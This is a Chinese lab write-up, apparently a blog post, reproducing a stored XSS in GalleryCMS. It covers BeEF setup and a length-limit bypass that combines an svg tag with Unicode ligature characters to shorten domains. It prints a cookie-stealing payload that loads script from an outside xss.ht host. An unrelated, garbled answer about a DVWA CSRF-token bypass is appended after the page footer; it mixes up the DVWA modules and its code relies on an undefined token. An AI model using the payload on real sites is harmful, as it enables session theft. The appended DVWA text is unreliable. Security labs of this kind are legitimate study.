复现gallerycms字符长度限制短域名绕过

首先在开始写实验之前,在kali上线安装一下beef-xss

1.在命令行中输入apt install beef-xss
请添加图片描述

2.但是他可能会这样报错,所以我尝试了一下进行更新,也就是输入命令
apt-get update
apt-get upgrade

然而,我在输入的时候依旧是不对的,他的显示结果是这样的。
请添加图片描述
3.我就百度了一下最后一条“Unmet dependencies. Try ‘apt --fix-broken install’ with no packages (or specify a solution)”的解决办法,就是安装一下fix-broken。
apt --fix-broken install
但是我找的那篇文张还让在更新一遍,也就是第2个内容,然后我就照着做了,紧接着我就一直等他下载,等他下载,等了好久,然后我也忘记了我时候给它暂停还是真的等到它结束了,然后我觉得可能下完就可以了,就不用更新那一下。然后又重新在此敲了一遍安装命令,
4.安装成功后,直接运行就可以了
beef-xss
在运行中途他会让你修改密码,就随意设置一下就可以了,他是不会显示的。
然后就结束了
5.使用浏览器访问,在输入框中输入192.168.121.135:3000/ui/panel就可以了,然后会让你输入账号和密码,如果没有修改配置文件的话,默认账号就是beef,然后密码是你在第一次运行时让设置的密码。

搭建一下galleryCMS的服务器。

1.先将解压包解压到phpstudy_pro/WWW目录下面,然后找到文件application/config/database.php文件,在这里插入图片描述
然后修改文件中的数据库的用户名和密码为自己本机上的用户名和密码是一样的。
在这里插入图片描述
2.启动小皮,把服务器和数据库打开,然后新增一个网站,并且把刚才解压的GalleryCMS了路径放到根目录下面,然后域名设置为文件名。这些操作弄好之后,重启Apache服务和MySQL。
在这里插入图片描述
3.因为我是用kali中的浏览器打开的文档,所以先在本地服务中查看IP地址,
打开CMD,使用ipconfig命令来查看IP,得到的IP就在kali中的浏览器进行输入,可以进入到页面,但是这个页面是存在报错的。(因为一顿解决,忘记截图,所以就没有问题的图片了)
4.根据显示出来的错误可以看出是服务器的错误,所以打开MySQL,创建数据库gallaycms,使用表。然后再回到浏览器里面,可以看到的他是注册成功的,但是进入之后还是有错误的,所以这个数据库还是有问题的。也就是我们在插入字符段的长度是不够的,所以要修改字符长度。
在数据库中插入一条命令:alter table user modify last_ip varchar(100) not null default '127.0.0.1';
然后将报错中有一条命令(insert开头的,具体的我也没记住),将这个命令复制粘贴到MySQL的命令里面,然后再重新进入到kali的浏览器当中,在重新进一下,我们就可以进入了。
在这里插入图片描述

开始复现实验

首先在创建新相册名字的时候,我们先随意输出,
在这里插入图片描述
F12看到这里将他将刚刚输入的值传到了a标签里面
在这里插入图片描述
所以就看一下源文档,可以看出来他是直接输出URL的地址,并且看到了添加相册是后走的是add方法,并且过滤了两端的空格,还默认了必须填写,并且默认长度为45。并且使用了xss-clean

xss-clean:将一些符号过滤成为一些实体,并将一些关键字进行了过滤,

因为说到这个过滤了很多标签,所以我们先将xss-clean删掉,然后再创建名称出填写:< script >标签。
在这里插入图片描述
回到目录页面的时候他会出现弹窗,是因为他在创建的时候已经入库了,所以每一次进入的时候,他都是访问的。
在这里插入图片描述
这里就说明可以使用js代码。
所以我么为了获取到对方的cookie,我们来尝试使用>$.getScript(“//trlsm.xss.ht”),
在这里插入图片描述
但是从图片可以看到我们使用最短的绕过方式,他也是字节太长,所以我们就是要修改这个的长度,

在源码当中我们规定的最长字符长度是:35
在这里插入图片描述虽然xss-clean过滤了很多标签,但是他还没有过滤掉< svg >标签,所以我们使用< svg>标签进行一个测试。
在这里插入图片描述
在这里插入图片描述
也就是可以找到一个svg的标签,来进行绕过。
在这里插入图片描述
但是这些个必备的命令已经有29个字符了,所以只能将域名缩短。
但是短域名的方式来实现,说以这里有一个知识点:

用短字符来绕过字符限制:这种的话比如说tel正常是3个字节,但是写成这样后℡,他会把他当成是一个字节来用。所以这样就尽可能的为我们节省了字符长度。

  • ff expands to ff
  • ℠ expands to sm
  • ㏛ expands to sr
  • st expands to st
  • ㎭ expands to rad
  • ℡ expands to tel

然后我尝试了用老师的域名来弄,但是因为没有文件什么的,也不能修改外网ip为本机的,然后我有没有自己的域名,所以我只能尝试放宽字符限制长度使用ip进行测试。可以看见beef上出现了。
在这里插入图片描述

在这里插入图片描述

  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
好的,下面我来为您介绍一下如何复现关于dvwa的CSRF-token绕过实验。 首先,您需要下载并安装DVWA(Damn Vulnerable Web Application),这是一个用于测试Web应用程序漏洞的虚拟机。可以从官网上下载安装包,然后按照指导进行安装。 接下来,您需要开启DVWA的CSRF防御功能。在DVWA的主界面上,选择"Setup"选项卡,然后选择"Create / Reset Database",点击"Submit"按钮,在弹出的窗口中输入用户名和密码,然后点击"Create / Reset Database"按钮。这将会重置数据库并创建一个新的用户帐户。 然后,选择"DVWA Security"选项卡,将"CSRF"选项卡中的"Security Level"设置为"high",这将启用DVWA的CSRF防御功能。 现在,您可以尝试复现CSRF-token绕过实验。在DVWA的主界面上,选择"SQL Injection"选项卡,然后选择"Login"。输入用户名和密码,然后点击"Login"按钮。这将会将您重定向到一个新的页面。 在这个页面上,您会看到一个表单,其中包含一个隐藏的CSRF令牌。这个令牌是用于防止CSRF攻击的。现在,您需要打开一个新的浏览器标签页,并访问一个恶意网站(例如:http://evil.com),该网站会在您的计算机上执行恶意的CSRF攻击。 返回到DVWA的页面,然后复制表单中的隐藏的CSRF令牌。在新的浏览器标签页中,打开Firebug或者Chrome Developer工具,然后进入"Console"选项卡。在控制台中输入以下代码: ```javascript var xhr = new XMLHttpRequest(); xhr.open('POST', 'http://localhost/dvwa/vulnerabilities/csrf/', true); xhr.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded'); xhr.send('username=admin&password=password&user_token=' + token); ``` 注意:其中的URL地址需要根据您自己的DVWA安装情况进行相应的修改。 最后,点击"Enter"键执行代码。如果一切正常,您会发现该代码已经成功地提交了一个恶意的POST请求,并且成功地绕过了DVWA的CSRF防御功能。 希望这个解释能够帮到您。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值